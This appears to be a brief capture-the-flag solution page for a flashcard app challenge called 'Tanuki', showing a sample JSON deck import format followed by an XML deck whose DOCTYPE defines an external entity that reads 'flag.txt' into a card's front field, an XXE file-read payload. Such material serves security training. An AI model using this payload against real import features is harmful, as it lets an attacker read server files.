Tanuki
{
"name": "Sample Deck",
"description": "A sample deck showing the import format for custom flashcards",
"category": "Example",
"cards":
[ { "front": "What is the capital of France?",
"back": "Paris - the city of lights and capital of France since 987 AD." },
{ "front": "What programming language is this app built with?",
"back": "JavaScript - using Node.js for backend and React for frontend." }
]
}<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE creds [
<!ELEMENT creds ANY >
<!ENTITY xxe SYSTEM "file://flag.txt" >]>
<deck>
<name>Ex Deck</name>
<cards>
<card>
<front>&xxe;</front>
<back>pass</back>
</card>
</cards>
</deck>
Last updated